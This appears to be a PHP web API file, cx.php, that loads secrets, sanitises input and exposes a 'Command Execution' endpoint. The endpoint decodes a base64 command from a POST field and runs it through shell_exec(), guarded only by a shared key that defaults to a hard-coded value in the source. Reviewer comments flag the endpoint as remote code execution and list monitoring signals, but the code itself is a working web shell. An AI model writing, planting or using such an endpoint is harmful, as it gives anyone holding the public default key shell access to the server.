html/api/cx.php

<?php
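// === WEVAL SECRETS LOADER ===
// Populates $_WEVAL_SECRETS (consumed by weval_secret()) with KEY=VALUE pairs read from
// /etc/weval/secrets.env. Lines starting with '#' are comments, lines without '=' are
// ignored, the first '=' splits key from value, and both sides are trimmed.
// NOTE(review): ownership and permissions of the secrets file are not checked here; the
// file has to be protected at the filesystem level.
$_WEVAL_SECRETS = [];
if (file_exists('/etc/weval/secrets.env')) {
    // file() returns false when the path exists but cannot be read (e.g. permissions).
    // Fall back to an empty list so the loader leaves $_WEVAL_SECRETS empty instead of
    // iterating over false; callers then see weval_secret()'s env/default fallback.
    $_weval_secret_lines = file('/etc/weval/secrets.env', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [];
    foreach ($_weval_secret_lines as $line) {
        if (strpos($line, '#') === 0) {
            continue;
        }
        if (strpos($line, '=') === false) {
            continue;
        }
        [$k, $v] = explode('=', $line, 2);
        $_WEVAL_SECRETS[trim($k)] = trim($v);
    }
    unset($_weval_secret_lines);
}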
/**
 * Resolve a configuration secret by name.
 *
 * Lookup order: the $_WEVAL_SECRETS map loaded from /etc/weval/secrets.env, then the
 * process environment via getenv(), then $default. The final step is a truthiness test
 * (the original `?:`), so a value that is present but falsy ('' or '0', or getenv()'s
 * false for a missing variable) also falls through to $default.
 *
 * @param string $key     Secret name, e.g. 'WEVAL_CX_KEY'.
 * @param mixed  $default Returned when no truthy value was found.
 * @return mixed
 */
function weval_secret($key, $default='') {
    global $_WEVAL_SECRETS;
    // `??` binds tighter than `?:`, so the map/env lookup is resolved first.
    $resolved = $_WEVAL_SECRETS[$key] ?? getenv($key);
    if ($resolved) {
        return $resolved;
    }
    return $default;
}
// === INPUT SANITIZATION ===
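/**
 * Fetch a request parameter and return it HTML-escaped.
 *
 * Reads $key from GET (default) or POST. The primary path is filter_input() with
 * FILTER_SANITIZE_FULL_SPECIAL_CHARS; when that yields null or false (variable absent,
 * filter failure, or a context such as the CLI where filter_input() has no request data)
 * the value is taken from the matching superglobal, trimmed, tag-stripped and passed
 * through htmlspecialchars(ENT_QUOTES, 'UTF-8').
 *
 * Caveats for callers:
 *  - The result is HTML-entity encoded at input time. It is meant for echoing into HTML
 *    (do not escape it a second time); it is not a neutral value for storage, shell, SQL
 *    or mail use — each of those needs its own per-context handling.
 *  - 'int' is intval() of the escaped string ('12abc' -> 12, non-numeric -> 0); it does
 *    not validate. Use FILTER_VALIDATE_INT where rejecting bad input matters.
 *  - 'email' applies FILTER_SANITIZE_EMAIL to the already-escaped string, so characters
 *    that were entity-encoded may be altered; it strips, it does not validate.
 *  - A parameter submitted as an array (key[]=...) is treated as absent and yields ''.
 *
 * @param string $key    Parameter name.
 * @param string $type   'string' (default), 'int' or 'email'.
 * @param string $method 'GET' (default) or 'POST'.
 * @return string|int|false  false only from the 'email' branch when filter_var() fails.
 */
function weval_input($key, $type='string', $method='GET') {
    $src = $method === 'POST' ? INPUT_POST : INPUT_GET;
    $val = filter_input($src, $key, FILTER_SANITIZE_FULL_SPECIAL_CHARS);
    if ($val === null || $val === false) {
        $val = ($method === 'POST') ? ($_POST[$key] ?? '') : ($_GET[$key] ?? '');
        // PHP delivers `key[]=...` as an array; trim()/strip_tags() on an array is a
        // TypeError in PHP 8, so non-scalar values are treated as missing.
        if (!is_scalar($val)) {
            $val = '';
        }
        $val = htmlspecialchars(strip_tags(trim((string) $val)), ENT_QUOTES, 'UTF-8');
    }
    if ($type === 'int') {
        return intval($val);
    }
    if ($type === 'email') {
        return filter_var($val, FILTER_SANITIZE_EMAIL);
    }
    return $val;
}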
// CX - Command Execution endpoint (secured)
// NOTE(review): this script hands a request-supplied string to shell_exec() (last line).
// Its only access control is the shared-secret comparison below; if that key is exposed
// or left at the hard-coded default, the file is an unauthenticated remote command
// execution endpoint. From a defensive standpoint, the presence of this file, writes to
// the audit log below, and shell processes spawned by the PHP process are all
// high-priority signals to monitor.
$ip = $_SERVER["REMOTE_ADDR"] ?? "";
// HTTP_CF_CONNECTING_IP is a request header; it reflects the real client only when the
// server is reachable exclusively through a proxy that sets it. Otherwise the address
// written to the audit log is caller-supplied and cannot be relied on for attribution.
$cf_ip = $_SERVER["HTTP_CF_CONNECTING_IP"] ?? $ip;
// Log all commands
// Logging happens before the key check, so rejected requests are recorded too. The raw
// value is decoded as base64 in non-strict mode (malformed input is not rejected), and a
// decode result of "0" is discarded by the truthiness test, leaving the raw value logged.
$c_raw = $_POST["c"] ?? "";
$d = base64_decode($c_raw); if($d) $c_raw = $d;
// Only the first 200 bytes are kept; they may be arbitrary binary after decoding.
$log = date("c") . " | CX | " . $cf_ip . " | " . substr($c_raw, 0, 200) . "\n";
// '@' suppresses write failures: if /var/log/droid-audit.log is not writable the command
// below still runs with no audit record. Alerting should cover this log going silent,
// not only its contents.
@file_put_contents("/var/log/droid-audit.log", $log, FILE_APPEND | LOCK_EX);
// Shared-secret check. weval_secret() falls back to the literal 'WEVADS2026' when neither
// the secrets file nor the WEVAL_CX_KEY environment variable supplies a truthy value, so
// the default is effectively public (it is in the source). The comparison is a plain
// `!==` rather than hash_equals(); an absent 'k' is compared as '' instead of being
// rejected outright.
if(($_POST['k']??'')!==weval_secret('WEVAL_CX_KEY','WEVADS2026')){http_response_code(403);die('NO');}
// Second, independent non-strict decode of the same POST field. A result of "" or "0"
// ends the request with 'NO CMD'; anything else is executed as-is.
$c=base64_decode($_POST['c']??'');
if(!$c){die('NO CMD');}
header('Content-Type:text/plain');
// Executes the decoded string through the system shell (stderr merged via 2>&1) with the
// privileges of the PHP process and returns the output verbatim to the caller.
echo shell_exec($c.' 2>&1');